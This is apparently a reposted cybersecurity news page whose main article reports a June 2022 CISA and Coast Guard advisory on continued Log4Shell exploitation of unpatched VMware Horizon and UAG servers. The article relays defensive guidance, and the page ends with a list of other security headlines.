If you would like us to get back to you, then please leave an email or alternative contact information.
For anonymous tips, you should use the Tor browser or you can contact us via Signal at (646) 961-3731.
NSA shares tips on securing Windows devices with PowerShell
The National Security Agency (NSA) and cybersecurity partner agencies issued an advisory today recommending system administrators to use PowerShell to prevent and detect malicious activity on Windows machines.
- June 22, 2022
- 06:10 PM
- 3
______________________________________________________________________________
TODAY
CISA: Log4Shell exploits still being used to hack VMware servers
- June 23, 2022
- 03:28 PM
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.
After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.
Today, in a joint advisory with the US Coast Guard Cyber Command (CGCYBER), the cybersecurity agency said that servers have been compromised using Log4Shell exploits to gain initial access into targeted organizations' networks.
After breaching the networks, they deployed various malware strains providing them with the remote access needed to deploy additional payloads and exfiltrate hundreds of gigabytes of sensitive information.
"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2)," the advisory revealed.
"In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data."
Unpatched VMware systems should be considered compromised
Organizations that haven't yet patched their VMware servers are advised to tag them as hacked and start incident response (IR) procedures.
The steps required for proper response in such a situation include the immediate isolation of potentially affected systems, collection and review of relevant logs and artifacts, hiring third-party IR experts (if needed), and reporting the incident to CISA.
"CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1," the two agencies said.
"If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA."
Today's advisory comes after VMware has also urged customers in January to secure Internet-exposed VMware Horizon servers against ongoing Log4Shell attacks.
Since the start of the year, VMware Horizon servers have been targeted by Chinese-speaking threat actors to deploy Night Sky ransomware, the Lazarus North Korean APT to deploy information stealers, and the TunnelVision Iranian-aligned hacking group to deploy backdoors.
Until you can install patched builds by updating all affected VMware Horizon and UAG servers to the latest versions, you can reduce the attack surface "by hosting essential services on a segregated demilitarized (DMZ) zone," deploying web application firewalls (WAFs), and "ensuring strict network perimeter access controls."
______________________________________________________________________________
LATEST ARTICLES
Get certified in cloud computing with this Microsoft Azure prep bundle
As cloud computing becomes more ubiquitous, getting certified in it can help your career. The Complete Microsoft Azure Certification Prep Bundle helps you master the cloud for $34.99, 97% off the $1194 MSRP.
- June 23, 2022
- 02:11 PM
- 0
Spyware vendor works with ISPs to infect iOS and Android users
Google's Threat Analysis Group (TAG) revealed today that RCS Labs, an Italian spyware vendor, has received help from some Internet service providers (ISPs) to infect Android and iOS users in Italy and Kazakhstan with commercial surveillance tools.
- June 23, 2022
- 01:07 PM
- 0
Microsoft aims to make Edge the go-to browser for gaming
Microsoft wants to make Edge the go-to browser for gaming, with new features unveiled today, including a new gaming portal and the public release of its Clarity boost upscaling feature when using Xbox Cloud Gaming.
- June 23, 2022
- 01:01 PM
- 0
Lithuania warns of rise in DDoS attacks against government sites
The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country.
- June 23, 2022
- 12:00 PM
- 0
Malicious Windows 'LNK' attacks made easy with new Quantum builder
Malware researchers have noticed a new tool that helps cybercriminals build malicious .LNK files to deliver payloads for the initial stages of an attack.
- June 23, 2022
- 11:04 AM
- 0
Automotive hose maker Nichirin hit by ransomware attack
Nichirin-Flex U.S.A, a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack causing the company to take the network offline.
- June 23, 2022
- 10:04 AM
- 0
Chinese hackers use ransomware as decoy for cyber espionage
Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and western companies are deploying ransomware as a decoy to cover up their malicious activities.
- June 23, 2022
- 09:00 AM
- 0
New MetaMask phishing campaign uses KYC lures to steal passphrases
A new phishing campaign is targeting users on Microsoft 365 while spoofing the popular MetaMask cryptocurrency wallet provider and attempting to steal recovery phrases.
- June 23, 2022
- 08:00 AM
- 0
Get more out of Windows with this PowerShell training bundle
PowerShell is a useful tool for getting on top of your to-do list and freeing up your time. The 2022 Windows PowerShell Certification Bundle helps you get the most from it for $19.99, 98% off the $1200 MSRP.
- June 23, 2022
- 07:12 AM
- 0
Conti ransomware hacking spree breaches over 40 orgs in a month
The Conti cybercrime syndicate runs one of the most aggressive ransomware operations and has grown highly organized, to the point that affiliates were able to hack more than 40 companies in a little over a month.
- June 23, 2022
- 06:05 AM
- 0
> Related Articles:
DHS orders federal agencies to patch VMware bugs within 5 days
Cybersecurity agencies reveal top initial access attack vectors
FBI, CISA, and NSA warn of hackers increasingly targeting MSPs
US govt: Paying Karakurt extortion ransoms won’t stop data leaks
CISA warns admins to patch actively exploited Spring, Zyxel bugs
No comments:
Post a Comment